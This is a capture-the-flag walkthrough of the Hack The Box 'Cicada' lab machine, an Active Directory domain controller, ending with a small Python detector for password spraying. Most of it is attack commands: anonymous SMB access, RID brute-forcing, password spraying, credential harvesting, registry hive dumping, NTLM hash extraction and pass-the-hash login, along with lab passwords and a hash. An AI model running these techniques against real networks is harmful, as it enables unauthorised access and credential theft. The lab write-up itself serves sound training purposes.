Cicada HTB Walkthrough

Step 1: Initial Enumeration with Nmap

The first step in attacking Cicada HTB is performing an Nmap scan to identify open ports and running services.

sudo nmap -sV -sC -oA nmap/cicada 10.10.11.35

Nmap Results

The scan revealed several open ports, including:

  • LDAP (389, 636, 3268, 3269)
  • SMB (445)
  • Kerberos (88)
  • MSRPC (135, 593)
  • DNS (53)

This port profile is characteristic of an Active Directory (AD) domain controller, so the rest of the enumeration focuses on SMB, Kerberos, and LDAP.

Step 2: Enumerating SMB Shares

Next, we check for accessible SMB shares:

smbclient -N -L //10.10.11.35

Discovered Shares:

  • ADMIN$
  • C$
  • DEV
  • HR
  • NETLOGON
  • SYSVOL

Step 3: Downloading HR Notices

Attempting to access the HR share without authentication:

smbclient //10.10.11.35/HR -U ""
get "Notice from HR.txt"

Inspecting the file:

cat Notice\ from\ HR.txt

This provides a default password:

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

Step 4: Enumerate Users with SMB

Using NetExec (nxc) to brute-force RIDs and build a list of domain users (saved as user.txt for the next step):

nxc smb 10.10.11.35 -u '.' -p "" --rid-brute

Step 5: Password Spraying with CME

Using CrackMapExec (CME) to spray the default password across the user list collected in the previous step:

cme smb 10.10.11.35 -u user.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

Success:

We discover the user michael.wrightson with valid credentials.

Step 6: Extracting User Descriptions

Using CrackMapExec to check user descriptions:

crackmapexec smb 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

This reveals another user’s password:

cicada.htb\david.orelious : Just in case I forget my password is aRt$Lp#7t*VQ!3

Step 7: Accessing the DEV Share

Using David’s credentials to explore the DEV share:

smbclient //10.10.11.35/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
smb: \> dir
smb: \> get backup_script.ps1

Step 8: Gaining a PowerShell Shell

The backup script reveals another password for Emily. Using Evil-WinRM to get a shell:

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35

Inside the shell, navigate to the desktop and retrieve user.txt:

cd C:\Users\emily.oscars\Desktop
cat user.txt

Step 9: Extracting SYSTEM & SAM Files

To escalate privileges, save the SAM and SYSTEM registry hives to disk (possible because the account holds the backup privilege needed to read them):

reg save hklm\sam sam
reg save hklm\system system

Step 10: Dumping Admin Hash

Using impacket-secretsdump to retrieve NTLM hashes:

impacket-secretsdump -sam sam -system system local

The dump reveals the Administrator NTLM hash.

Step 11: Logging in as Administrator

Using Evil-WinRM with the extracted hash:

evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i 10.10.11.35

Once inside, retrieve root.txt:

cd C:\Users\Administrator\Desktop
cat root.txt

Conclusion

By leveraging SMB enumeration, password spraying, and privilege escalation, we successfully exploited the Cicada box and obtained both user and root flags. This demonstrates the importance of strong passwords, SMB hardening, and monitoring Active Directory environments for unauthorized access attempts.
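The monitoring point above can be made concrete for the spraying seen in Step 5. The following is an added example, not part of the original walkthrough: a minimal detector that flags a source IP whose failed logons (event 4625) hit several distinct accounts in a short window and records any successful logon (4624) from that source in the same window. The event tuples, the threshold and the window are constructed assumptions for the demo.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security events (not real logs from the box):
# (timestamp, event_id, target_user, source_ip). 4625 = failed logon, 4624 = success.
SAMPLE_EVENTS = [
    ("2024-10-01T10:00:01", 4625, "user.a", "10.10.14.5"),
    ("2024-10-01T10:00:02", 4625, "user.b", "10.10.14.5"),
    ("2024-10-01T10:00:03", 4625, "emily.oscars", "10.10.14.5"),
    ("2024-10-01T10:00:04", 4625, "david.orelious", "10.10.14.5"),
    ("2024-10-01T10:00:05", 4624, "michael.wrightson", "10.10.14.5"),
    ("2024-10-01T10:05:00", 4625, "michael.wrightson", "10.10.14.9"),  # lone typo, not a spray
]


def detect_password_spray(events, threshold=3, window=timedelta(minutes=5)):
    """Return one finding per source IP whose 4625 events cover at least
    `threshold` distinct accounts within `window`. A spray is one password
    tried against many users, so distinct *targets* per source is the signal,
    not the raw failure count. Any 4624 from the same source inside the window
    is reported as `succeeded_as`: the spray found a valid credential."""
    by_src = defaultdict(list)
    for ts, eid, user, src in events:
        by_src[src].append((datetime.fromisoformat(ts), eid, user))

    findings = []
    for src, evs in by_src.items():
        evs.sort()  # chronological per source
        for i, (t0, eid, _) in enumerate(evs):
            if eid != 4625:
                continue  # windows start at a failure
            in_window = [e for e in evs[i:] if e[0] - t0 <= window]
            failed_users = {u for _, e, u in in_window if e == 4625}
            if len(failed_users) >= threshold:
                successes = sorted({u for _, e, u in in_window if e == 4624})
                findings.append({"source": src, "start": t0.isoformat(),
                                 "distinct_failed": len(failed_users),
                                 "succeeded_as": successes})
                break  # one finding per source is enough for triage
    return findings


if __name__ == "__main__":
    for f in detect_password_spray(SAMPLE_EVENTS):
        print(f"spray from {f['source']} starting {f['start']}: "
              f"{f['distinct_failed']} accounts, landed as {f['succeeded_as']}")
```

In a real deployment the same logic runs over 4625/4624 records pulled from the domain controllers' Security logs, keyed on the source workstation or IP field of each event.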